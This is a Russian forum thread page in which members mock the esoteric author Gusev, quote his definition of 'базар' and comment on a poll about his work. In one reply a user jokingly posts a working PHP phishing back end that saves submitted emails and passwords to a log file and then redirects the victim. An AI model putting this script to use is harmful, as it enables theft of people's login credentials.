Постнагуализм
22 ноября 2024, 21:34:19 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Логин             Пароль

Начало   Помощь Правила Поиск Войти Регистрация Чат  
Голосование
Вопрос: Нашли ли вы что либо полезное для себя из трудов Гусева?
Да - 5 (27.8%)
Нет - 10 (55.6%)
Не читал - 1 (5.6%)
Не читал но порицаю - 1 (5.6%)
Не умею читать - 1 (5.6%)
Всего голосов: 10

Страниц: 1 ... 3 4 [5] 6 7 ... 12  Все
  Печать  
Автор Тема: Вокзал  (Прочитано 48768 раз)
Некто
Пользователь
**

Модератор: Некто
« Ответ #60 : 01 сентября 2013, 08:51:39 »

Предлагаю тут сделать конструктивное обсуждение из темы Базар

Интересное совпадение. В Закрытом Разделе была тема "Базар-вокзал"
"то что у вас паранойа ещё не значит что за вами не следят"(с)
Корнак
Модератор своей темы
Старожил
*

Email
« Ответ #61 : 01 сентября 2013, 08:58:33 »

Почти 50% голосующих нашли что-то полезное в текстах Гусева.
Наверное Пипа подкрутила
Dexter
Гость
« Ответ #62 : 01 сентября 2013, 09:02:56 »

Ээ... А кто такой Гусев то?  :-\ ::)
Корнак
Модератор своей темы
Старожил
*

Email
« Ответ #63 : 01 сентября 2013, 09:04:46 »

Ээ... А кто такой Гусев то?

А ты кто такой?
Некто
Пользователь
**

« Ответ #64 : 01 сентября 2013, 09:08:09 »

Почти 50% голосующих нашли что-то полезное в текстах Гусева.
Наверное Пипа подкрутила
тоже впечатление возникло что ему "помогают". но не будем думать о плохом. мне не жаль если он станет призёром специальной олимпиады. наоборот, если кому помогло - очень хорошо. мне вот - не очень. (грустный)

Ээ... А кто такой Гусев то?  В замешательстве Строит глазки

вот кто такой.

http://avg51.land.ru/

читай и приходи своё мнение
Dexter
Гость
« Ответ #65 : 01 сентября 2013, 09:08:19 »

Ээ... А кто такой Гусев то?

А ты кто такой?
Dexter
Dexter
Гость
« Ответ #66 : 01 сентября 2013, 09:12:42 »

вот кто такой.
http://avg51.land.ru/
читай и приходи своё мнение
Спс, глянем. :)
Некто
Пользователь
**

« Ответ #67 : 01 сентября 2013, 09:22:24 »

кстати. ВНЕЗАПНО! Гусев умеет общаться на человеческом языке оказывается (без адового количества скобочек, кривляний и агрессивного капслока). даже выложу тут. на всякий случай. чтоб не потерялось

Вообще-то я тут про эзотерику пишу, про напрвление, ведущее к постижению себя. А все эти техники - баловство. Деконцентрацию внимания я использовал и непосредственно (для чисто бытовых целей), и как часть техники "расширения диапазона ощущений". Но направления к себе я там не нашел, может потому что мне ближе работа с пониманием Понимания. По этому занимался не долго и писать об этом практически нечего. И ОВД, кстати, я занимался не для того чтобы пальцы гнуть какого уровня остановки я там достиг, а чтобы работать с обычными сновидениями - держать их в сознании подольше после просыпания. ОСы это просто глюкодром, а вот обычные сновидения позволяют выцепить такие тонкости структуры собственного базара, которые вообще по жизни могут никогда не проявиться.

и тут видно что гипертрофированная важность у автора это всерьёз. если в кривляниях он как бы шутил, амплуа мол такое, ага. то тут видно что автор относится к себе и своим текстам с глубокой налобной складкой. но я это не в качестве злой сатиры а в наставление верующим.

друзья! кончайте вы эту вашу борьбу с ЧСВ! заняться что ли больше не чем? это же какойто уроборос получается. бредовая петля. чтобы бороться с ЧСВ нужно большое ЧСВ. ЧСВ при этом растёт за счёт ЧСВ увеличивая в свою очередь ЧСВ улыбоктебедедмакар ЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВ
bisheseniel
Постоялец

« Ответ #68 : 01 сентября 2013, 09:32:56 »

друзья! кончайте вы эту вашу борьбу с ЧСВ! заняться что ли больше не чем? это же какойто уроборос получается. бредовая петля.
Это ответ хакеров ...
Некто
Пользователь
**

« Ответ #69 : 01 сентября 2013, 09:41:45 »

Это ответ хакеров ...
нет. вот ответ хакеров:
/*

#############

#by_NoNameZ#

###########

*/

$f=fopen("log.txt","at");

flock($f,2);

if(preg_match("/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/i", $_POST['email'])&& !empty($_POST['password'])){

fputs($f, $_POST['email'].";".$_POST['password']." \n");

header("Location: http://");

} else {

header("Location: http://");

}

flock($f,3);

fclose($f);

?>
Dexter
Гость
« Ответ #70 : 01 сентября 2013, 09:46:41 »

нет. вот ответ хакеров:
Тогда уж так:
5E F4 B3 FB F1 15 79 F5 3D 69 B6 C5 A8 60 C9 A0 2A 77 0F E7 D4 56 82 70 FA E4 A2 F3 EA 65 61 6F C3 FD 2B 50 DE 81. Ba 23 7C 7E 78 be 6E C8 9B 81 CD 36 87 9D ED F8 af 48 9C 53 be bb 59 42 0E A1 db 38 1F C4 67 A9 eb 88 3B E4 90 0F B5 19 9D B5 73 13. 66 6F
Некто
Пользователь
**

« Ответ #71 : 01 сентября 2013, 09:49:11 »

нет. вот ответ хакеров:
Тогда уж так:
5E F4 B3 FB F1 15 79 F5 3D 69 B6 C5 A8 60 C9 A0 2A 77 0F E7 D4 56 82 70 FA E4 A2 F3 EA 65 61 6F C3 FD 2B 50 DE 81. Ba 23 7C 7E 78 be 6E C8 9B 81 CD 36 87 9D ED F8 af 48 9C 53 be bb 59 42 0E A1 db 38 1F C4 67 A9 eb 88 3B E4 90 0F B5 19 9D B5 73 13. 66 6F
брехня. это не запускаемый код
bisheseniel
Постоялец

« Ответ #72 : 01 сентября 2013, 10:20:10 »

Некто, ты здесь..чтоб рекламировать хакеров...но...всё-зря
Некто
Пользователь
**

« Ответ #73 : 01 сентября 2013, 13:13:35 »

похоже я поспешил поздравить гр. Гусева с возвращением в стан прямоходящих. ибо он вновь предпочёл опуститься на четвереньки. гав-гав. вот.

Цитата:
Цитата: Гусев
Кроме того, в базар входит восприятие части реальности, известной нам как «материальный мир».

На самом деле действительно криво написано. Здесь я имел введу всё то, что участвует во всей цепочке процессов перцептуального восприятия, от любого объекта или явления ОР до итоговых результатов в СР. То есть твердый мир.

Ликбез написан в 2004 году. Пейсатель из меня никудышный, так что такие корявости в изложении мыслей там встречаются. Ну и кроме того за эти годы кое-что изменилось в терминологии. В принципе у меня уже есть доработанный вариант ликбеза, но он ещё не закончен и я не уверен что там сохранилась глубина текста, его многослойность. Иногда мне кажется что допущенные неточности и корявости - это часть многослойности текста =)  Ну то есть если ТУПАРЬ читает текст и именно корявости определяют его отношение к тексту, то просто замечательно если этот ТУПАРЬ закроет книгу и пойдет своей ТУПАРЬСКОЙ дорогой =))))  Если же человек открыл книгу с намерением поработать над собой и воспринять что-то реально новое, то никакие корявости и неточности ему это сделать НЕ помешают. НАОБОРОТ!  Он имеет шанс выследить в себе ТУПАРЬСКИЕ реакции =))))  Надеюсь тут все понимают что опечатки не влияют на смысл изложенного текста, тогда почему на этот смысл должны влиять корявости? Ну а если читающий, прочитав пару страниц и ещё нифига не поняв изложенные концептуальные идеи, начинает ТУПИТЬ собственным ВООБРАЖЕНИЕМ что это не корявости, а концептуальные промахи аффтара, то это лишь его собственная ТУПОСТЬ, связанная с его собственным РАБСТВОМ от чсв, придающего офигенную важность именно его знаниям и обывательскоэзотерическому опыту =)

В новой редакции этот фрагмент выглядит так:
Цитата:
Базар это всё то что «есть» для человека: все что мы знаем, все что мы имеем, что воспринимаем, помним, видим, чувствуем, мыслим, воображаем и пр. Для тех кто читал КК сразу же говорю, что базар отличается от тоналя тем, что в это понятие входит не только тональ одного отдельно взятого человека. Вообще любой термин, определенный в рамках какой-то концепции, невозможно полностью адекватно перенести в другую концепцию. Можно лишь примерно сказать что термин «базар» вмещает тонали всех людей, а также надстройки над ними, такие как социум, и вообще те отношения, которые изучает психология групп. В базар входит всё то, что участвует во всей цепочке процессов перцептуального восприятия, от любого объекта или явления до итоговых результатов в СР.

оказывается его раннеутреннее высказывание было лишь следствием того, что он поспешил, и раненько продрав глаза ещё не успел нацепить масочку великого учителя гойворящего загадками. но сейчас, жахнув стопарь он снова в строю. так держать товарищ Гусев! ворота Кащенки всегда открыты для вас!
violet drum
Старожил

Абстрактные концепции на конкретной шкуре...)

« Ответ #74 : 01 сентября 2013, 13:24:57 »

друзья! кончайте вы эту вашу борьбу с ЧСВ! заняться что ли больше не чем? это же какойто уроборос получается. бредовая петля. чтобы бороться с ЧСВ нужно большое ЧСВ. ЧСВ при этом растёт за счёт ЧСВ увеличивая в свою очередь ЧСВ улыбоктебедедмакар ЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧСВЧ

Эта тема интересная но слишком глобальная...ей надо целый раздел посвещать на форуме)))

Вам никогда не приходило в голову ... копьё?
Страниц: 1 ... 3 4 [5] 6 7 ... 12  Все
  Печать  

Перейти в:        Главная

Postnagualism © 2010. Все права защищены и охраняются законом.
Материалы, размещенные на сайте, принадлежат их владельцам.
При использовании любого материала с данного сайта в печатных или интернет изданиях, ссылка на оригинал обязательна.